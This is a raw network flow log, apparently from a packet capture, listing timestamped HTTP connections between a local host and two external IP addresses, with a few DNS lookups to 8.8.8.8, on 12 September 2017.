Sep 12, 2017 22:18:51.136802912 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.142178059 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.142199993 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.142327070 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:51.142359018 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.176336050 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.176388025 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.176422119 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.176631927 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:51.176657915 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.176685095 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.181616068 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.181655884 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.181674957 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.181804895 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.184483051 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:51.208307028 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.208559990 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.215300083 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.215343952 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.215358973 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.215565920 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.217335939 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.217366934 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.217380047 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.217571974 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.246176004 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.246206999 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.246215105 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.246229887 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.246428013 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.304805040 MESZ	56657	53	192.168.1.16	8.8.8.8
Sep 12, 2017 22:18:51.321736097 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.321770906 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.321911097 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:51.321939945 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.336507082 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.336539030 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.336546898 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.336680889 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:51.336713076 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.336868048 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.336882114 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.340614080 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:51.340671062 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.369255066 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.369290113 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.369318008 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.369452953 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:51.369477987 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.369504929 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.371443987 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.371665955 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.371674061 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.371752024 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.372503996 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.397753000 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.398221016 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.401050091 MESZ	53	56657	8.8.8.8	192.168.1.16
Sep 12, 2017 22:18:51.401082039 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.401092052 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.401099920 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.401407003 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.409154892 MESZ	64336	53	192.168.1.16	8.8.8.8
Sep 12, 2017 22:18:51.416239977 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.416258097 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.416271925 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.416668892 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.431058884 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.431092978 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.431111097 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.431298971 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.433752060 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.433774948 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.433782101 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.434143066 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:51.434185982 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.462001085 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.462030888 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.462192059 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:51.462246895 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.471009016 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.471036911 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.471340895 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:51.471379995 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.481952906 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.481986046 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.482011080 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.482167959 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:51.482192993 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.482220888 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.501750946 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.501785994 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.501797915 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.502047062 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.511851072 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.512178898 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.512710094 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.512732029 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.512743950 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.512945890 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.513381004 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.513422012 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.513444901 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.513793945 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.520894051 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.520927906 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.520950079 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.521363974 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.549576998 MESZ	53	64336	8.8.8.8	192.168.1.16
Sep 12, 2017 22:18:51.552331924 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.552361965 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.552386999 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.552855968 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:51.552891016 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.582144976 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.582182884 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.582351923 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:51.582391024 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.589764118 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.589782953 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.589917898 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:51.589950085 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.615149021 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.615173101 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.615197897 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.615391970 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:51.615422964 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.615458965 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.621457100 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.621478081 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.621490002 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.621692896 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.656405926 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.656667948 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.671658039 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.671681881 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.671686888 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.671909094 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.695048094 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.695087910 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.695122957 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.695358992 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.695996046 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.696010113 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.696017981 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.696182013 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.701420069 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.701450109 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.701462984 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.701580048 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:51.701605082 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.735167980 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.735207081 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.735331059 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:51.735351086 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.735836029 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.735863924 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.735981941 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.736004114 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.736042023 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.736094952 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:51.736128092 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.736617088 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.741483927 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.741841078 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.769984961 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.770035028 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.770056009 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.770307064 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.806042910 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.806447029 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.807709932 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.807739019 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.807750940 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.807997942 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.845700026 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.845731020 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.845738888 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.846116066 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.848309040 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.848329067 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.848336935 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.848644018 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.848757029 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.848773956 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.848783016 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.849140882 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:51.849179983 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.887126923 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.887162924 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.887432098 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:51.887505054 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.925563097 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.925595045 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.925925016 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:51.925957918 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.934961081 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.934984922 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.935007095 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.935053110 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:51.935084105 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:51.935667992 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.951524973 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.951548100 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.951565981 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.951718092 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.965367079 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.966001987 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.976046085 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.976075888 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.976089001 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.976238966 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.976944923 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.976973057 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.976988077 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.977144957 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.977165937 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.977252007 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:51.977293015 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:51.977900982 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.007910967 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.007946014 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.007953882 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.008143902 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:52.008209944 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.046638012 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.046683073 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.046888113 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:52.046930075 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.063355923 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.063394070 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.063594103 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.063617945 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.063647985 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.063698053 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:52.063776016 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.064749002 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:52.064802885 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.085350037 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.085577011 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.095253944 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.095285892 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.095297098 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.095489979 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.117702961 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.120634079 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.128015995 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.128051996 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.128067970 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.128243923 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.128365040 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.128386021 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.128395081 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.132627010 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.135235071 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.135262012 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.135271072 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.135287046 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.135448933 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.173059940 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.173096895 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.173110008 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.173247099 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:52.173273087 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.208343029 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.208374977 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.208530903 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:52.208558083 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.223984957 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.224015951 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.224232912 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:52.224265099 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.224705935 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.224731922 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.224754095 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.224903107 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:52.224929094 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.224960089 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.238413095 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.238670111 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.271889925 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.271908998 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.271920919 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.272491932 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.278136969 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.278631926 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.278708935 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.278723001 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.278736115 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.279447079 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.281222105 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.281235933 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.281243086 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.281377077 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.303311110 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.303333998 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.303345919 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.303663015 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.309808016 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.309844971 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.309859037 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.310189962 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:52.310225964 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.344582081 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.344619989 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.344944954 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:52.344974041 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.362838030 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.362883091 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.363243103 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:52.363270998 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.382225990 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.382273912 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.382307053 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.382632971 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:52.382673979 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:52.382724047 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.388459921 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.388493061 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.388511896 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.388796091 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:52.409475088 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.409749031 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.409765005 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:52.409881115 MESZ	49201	80	192.168.1.16	88.221.14.177
